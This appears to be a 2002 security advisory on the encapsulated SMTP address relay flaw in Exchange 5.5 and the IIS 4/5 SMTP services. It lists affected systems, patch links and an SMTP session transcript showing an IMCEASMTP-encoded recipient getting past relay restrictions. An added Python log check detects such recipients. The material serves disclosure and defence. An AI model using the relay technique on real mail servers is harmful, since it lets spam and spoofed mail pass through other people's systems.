
Microsoft IIS SMTP Service Encapsulated SMTP Address Vulnerability


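Published: 2002-07-15
Updated: 2002-07-15
Severity:
Threat level: Server information disclosure
Error type: Failure to handle exceptional conditions
Exploitation method: Server mode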

BUGTRAQ ID:5213

Affected systems
Microsoft Exchange Server 5.5 SP2
   - Microsoft BackOffice 4.5
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0 SP1
   - Microsoft Windows NT 4.0 SP2
   - Microsoft Windows NT 4.0 SP3
   - Microsoft Windows NT 4.0 SP4
   - Microsoft Windows NT 4.0 SP5
   - Microsoft Windows NT 4.0 SP6
   - Microsoft Windows NT 4.0 SP6a
Microsoft Exchange Server 5.5 SP1
   - Microsoft BackOffice 4.5
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0 SP1
   - Microsoft Windows NT 4.0 SP2
   - Microsoft Windows NT 4.0 SP3
   - Microsoft Windows NT 4.0 SP4
   - Microsoft Windows NT 4.0 SP5
   - Microsoft Windows NT 4.0 SP6
   - Microsoft Windows NT 4.0 SP6a
Microsoft Exchange Server 5.5
   - Microsoft BackOffice 4.5
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0 SP1
   - Microsoft Windows NT 4.0 SP2
   - Microsoft Windows NT 4.0 SP3
   - Microsoft Windows NT 4.0 SP4
   - Microsoft Windows NT 4.0 SP5
   - Microsoft Windows NT 4.0 SP6
   - Microsoft Windows NT 4.0 SP6a
Microsoft IIS 4.0
   + Cisco Building Broadband Service Manager 5.0
   + Cisco Call Manager 1.0
   + Cisco Call Manager 2.0
   + Cisco Call Manager 3.0
   + Cisco ICS 7750
   + Cisco IP/VC 3540
   + Cisco Unity Server 2.0
   + Cisco Unity Server 2.2
   + Cisco Unity Server 2.3
   + Cisco Unity Server 2.4
   + Cisco uOne 1.0
   + Cisco uOne 2.0
   + Cisco uOne 3.0
   + Cisco uOne 4.0
   + Microsoft BackOffice 4.0
   + Microsoft BackOffice 4.5
   + Microsoft Windows NT 4.0 Option Pack
Microsoft IIS 5.0
   + Microsoft Windows 2000 Advanced Server
   - Microsoft Windows 2000 Advanced Server SP1
   - Microsoft Windows 2000 Advanced Server SP2
   - Microsoft Windows 2000 Datacenter Server SP1
   - Microsoft Windows 2000 Datacenter Server SP2
   + Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional SP2
   + Microsoft Windows 2000 Server
   - Microsoft Windows 2000 Server SP1
   - Microsoft Windows 2000 Server SP2
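Details
Microsoft Exchange 5.5 and the SMTP service included with IIS contain an encapsulated SMTP address vulnerability.

This vulnerability was first reported in MS99-027, which described it as affecting Exchange Server 5.5, and the patch Microsoft released covers only Exchange Server 5.5. However, the vulnerability is also present in the SMTP service bundled with IIS 4 and 5, and Microsoft has not provided a patch for these IIS SMTP services.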

Test code
220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at Tue, 28 May 2002 14:54:10 +0100
helo
250 test-mailer Hello [IP address of source host]
MAIL FROM: test@test.com
250 2.1.0 test@test.com....Sender OK
RCPT TO: test2@test.com
550 5.7.1 Unable to relay for test@test.com
RCPT TO: IMCEASMTP-test+40test+2Ecom@victim.co.uk
250 2.1.5 IMCEASMTP-test+40test+2Ecom@victim.co.uk
data
354 Start mail input; end with <CRLF>.<CRLF>
Subject: You are vulnerable.
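
A log check for the recipient pattern in the transcript above, as an added example that is not part of the original advisory. It decodes IMCEASMTP-encapsulated recipients and flags those whose inner domain is not local; the function names, the `local_domains` parameter and the sample lines are assumptions made for illustration.

```python
import re

# Assumption: only the +XX hex escaping seen in the transcript is decoded
# (+40 = "@", +2E = ".").
IMCEA_RE = re.compile(r"^IMCEASMTP-(?P<enc>[^@]+)@(?P<gw>[^@>\s]+)$", re.IGNORECASE)
RCPT_RE = re.compile(r"^RCPT TO:\s*<?(?P<addr>[^>\s]+)>?", re.IGNORECASE)


def decode_imceasmtp(address):
    """Return (inner_address, gateway_domain), or None if not encapsulated."""
    m = IMCEA_RE.match(address)
    if not m:
        return None
    inner = re.sub(r"\+([0-9A-Fa-f]{2})",
                   lambda h: chr(int(h.group(1), 16)), m.group("enc"))
    return inner, m.group("gw").lower()


def find_relay_attempts(lines, local_domains):
    """Flag RCPT TO commands whose encapsulated recipient is not a local domain."""
    local = {d.lower() for d in local_domains}
    findings = []
    for n, line in enumerate(lines, 1):
        m = RCPT_RE.match(line.strip())
        decoded = decode_imceasmtp(m.group("addr")) if m else None
        if decoded is None:
            continue  # not a RCPT TO line, or a plain (non-encapsulated) recipient
        inner, gateway = decoded
        # A decoded value with no "@" is treated as non-local and reported.
        if inner.rpartition("@")[2].lower() not in local:
            findings.append((n, gateway, inner))
    return findings


# Constructed sample input: commands from the transcript plus constructed recipients.
SAMPLE = [
    "MAIL FROM: test@test.com",
    "RCPT TO: test2@test.com",
    "RCPT TO: IMCEASMTP-test+40test+2Ecom@victim.co.uk",
    "RCPT TO: <IMCEASMTP-alice+40victim+2Eco+2Euk@victim.co.uk>",
    "RCPT TO: bob@victim.co.uk",
]

if __name__ == "__main__":
    for n, gw, inner in find_relay_attempts(SAMPLE, {"victim.co.uk"}):
        print(f"line {n}: encapsulated recipient {inner!r} via {gw} is not local")
```
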

Solution
Patch download:

Microsoft IIS 4.0:
Microsoft IIS 5.0:
Microsoft Exchange Server 5.5 SP2:

Microsoft Patch psp2imca.zip
ftp://ftp.microsoft.com/bussys/exchange/exchange-public/fixes/Eng/Exchg5.5/PostSP2/imc-fix/psp2imca.zip

Microsoft Patch psp2imci.zip
ftp://ftp.microsoft.com/bussys/exchange/exchange-public/fixes/Eng/Exchg5.5/PostSP2/imc-fix/psp2imci.zip

Microsoft Exchange Server 5.5 SP1:
Microsoft Exchange Server 5.5:

Related information
Reference: http://online.securityfocus.com/archive/1/281914
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS99-027.asp